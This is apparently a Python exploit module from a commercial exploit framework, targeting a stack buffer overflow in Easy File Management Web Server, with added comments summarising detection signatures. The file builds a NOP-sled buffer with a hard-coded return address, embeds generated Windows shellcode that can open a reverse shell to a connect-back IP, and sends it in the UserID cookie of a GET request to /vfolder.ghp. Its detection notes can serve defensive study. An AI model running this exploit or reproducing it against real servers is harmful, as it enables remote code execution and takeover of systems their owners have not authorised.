#!/usr/bin/python
# -*- coding: utf-8 -*-
# The exploit is a part of Agora pack - use only under the license agreement
# specified in LICENSE.txt in your Agora distribution
import sys
import socket
sys.path.append("./core")
sys.path.append("./shellcodes")
from Sploit import Sploit
from shellcodes.Shellcodes import OSShellcodes
# Module metadata read by the framework. No CVE identifier is recorded for this
# issue ("N/A"), so tracking it relies on the product name and vendor URL.
INFO = {
    'NAME': "ef_easyfile_webserver_sbo",
    'DESCRIPTION': "Easy File Management Web Server Stack Buffer Overflow",
    'VENDOR': "http://www.sharing-file.com/",
    "CVE Name": "N/A",
    "NOTES": """
Stack buffer overflow
Tested on win xp sp2 32 bit, Tested on Windows 7 64 bit
""",
    'CHANGELOG': "14 July, 2015. Written by Gleg team.",
    'PATH': "Exploits/",
}

# Must be in every module, to be set by framework.
# The two address defaults are private-range (192.168.x.x) lab values.
OPTIONS = {
    "HOST": "192.168.153.140",
    "PORT": "80",
    "CONNECTBACK IP": "192.168.153.1",
    "CLOUD GENERATE": False,
}
# Framework module (Sploit subclass) for the issue named in INFO['DESCRIPTION']:
# a stack buffer overflow in Easy File Management Web Server.
# Defender summary, taken from the request built in exploit() below: the
# overflow data travels in the UserID field of the Cookie header on
# "GET /vfolder.ghp", so an oversized or non-printable UserID cookie value on
# that path is the thing to alert on and to reject at a proxy or WAF.
# NOTE(review): self.host, self.port, self.connectback_ip, self.cloud_generate
# and self.args are not assigned in this file - presumably populated by Sploit
# from OPTIONS; confirm against the base class.
class exploit(Sploit):
# Hand the module-level OPTIONS to the Sploit base class and record the module
# name from INFO.
def __init__(self, logger=None):
Sploit.__init__(self, logger=logger, options=OPTIONS)
self.name = INFO['NAME']
return
# Ask the framework's OSShellcodes generator for the code blob that exploit()
# embeds in the request. Returns the generated value, or False when the
# generator returned something falsy.
def create_shellcode(self):
self.log("[] Generate shellcode started")
# Characters handed to the generator as values to avoid: NUL and 0x3B (';').
# NOTE(review): ';' also separates the cookie fields in the request built by
# exploit() - presumably the reason it is excluded; confirm.
badstring = ["\x00", "\x3B"]
ip = self.connectback_ip
# Defaults used when no listener is configured.
port = 5555
shellcode_type = 'command'
# With a listener configured, take its port and switch to the 'reverse' type.
if self.args['listener']:
port = int(self.args['listener']['PORT'])
shellcode_type = 'reverse'
# The generator is fixed to a 32-bit Windows target.
os_target = "WINDOWS"
os_arch = '32bit'
s = OSShellcodes(os_target, os_arch, ip, port, badstring)
# If cloud_generate is true, a request is sent to the framework's cloud
# generation server, which returns the generated blob base64-encoded; it is
# decoded inside create_shellcode before being returned. The server address
# is configured in config.py in the root directory of the East framework.
shellcode = s.create_shellcode(
shellcode_type,
encode=1,
debug=1,
cloud_generate=self.cloud_generate
)
# Report-only check: a hit prints a message but does not change what is returned.
for i in badstring:
if i in shellcode:
print("FOUND BAD SYMBOL")
return shellcode if shellcode else False
# Build one HTTP GET request whose UserID cookie field carries the overflow
# data, send it to self.host:self.port over TCP, and return True once it has
# been sent. Returns False when the blob could not be generated or the TCP
# connection failed. True therefore means "sent", not "confirmed".
#
# Detection notes, all taken from the literals below: request path
# /vfolder.ghp, User-Agent "Mozilla/4.0", "Host:" with no space after the
# colon, the misspelled header name "Conection", cookie "SESSIONID=1337", and
# a UserID value padded to at least 1500 bytes that consists largely of 0x90
# bytes. The cookie length and the non-printable bytes are the durable
# signals; the header quirks identify only this script as written.
def exploit(self):
self.log("exploit run")
shellcode = self.create_shellcode()
if not shellcode:
self.log("shellcode can't create")
return False
self.log("shellcode created")
# Fixed-layout buffer: 0x90 filler, two hard-coded 4-byte values, more
# filler, then the generated blob.
payload = "\x90" * 64
payload += "\x90\x90\xEB\x1F"
payload += "\xF2\x95\x01\x10"
# ImageLoad.dll
payload += "\x90" * 20
payload += "\x90" * 8
payload += "\x90" * 4
payload += shellcode
# Pad with 0x90 up to 1500 bytes; a negative count yields an empty string, so
# a buffer already longer than 1500 bytes is left unchanged.
payload += "\x90" * (1500 - len(payload))
# Request template; the only %s placeholder is the UserID cookie field.
buf = "GET /vfolder.ghp HTTP/1.1\r\n"
buf += "User-Agent: Mozilla/4.0\r\n"
buf += "Host:" + self.host + ":" + str(self.port) + "\r\n"
buf += "Accept: text/html,application/xhtml+xml,"
buf += "application/xml;q=0.9,*/*;q=0.8\r\n"
buf += "Accept-Language: en-us\r\n"
buf += "Accept-Encoding: gzip, deflate\r\n"
buf += "Referer: http://" + self.host + "/\r\n"
buf += "Cookie: SESSIONID=1337; UserID=%s; PassWD=;\r\n"
buf += "Conection: Keep-Alive\r\n\r\n"
# Substitute the buffer into the UserID field.
buf = str(buf) % payload
# Plain TCP socket; no timeout is set here.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.host, int(self.port)))
self.log("[*] Connected to " + self.host + "!")
except Exception as e:
# Any connection error is logged and reported as failure.
self.log(e)
self.log("[!] " + self.host + " didn't respond")
return False
self.log("[*] Sending malformed request...")
# NOTE(review): buf is a str; the file uses Python 2 syntax elsewhere, where
# str is a byte string. No response is read after sending, so the outcome is
# visible only on the server side (crash or restart of the service, and the
# request itself in access logs).
s.send(buf)
self.log("[!] Exploit has been sent!")
s.close()
return True
# Framework entry point: run exploit(), report the outcome through
# self.finish, and return 1 when the request was sent or 0 otherwise.
def run(self):
if self.exploit():
self.finish(True)
return 1
else:
self.finish(False)
return 0
if __name__ == '__main__':
    # By now we only have the tool mode for exploit..
    # Later we would have standalone mode also.
    print("Running exploit %s .. " % INFO['NAME'])
    module = exploit()
    module.run()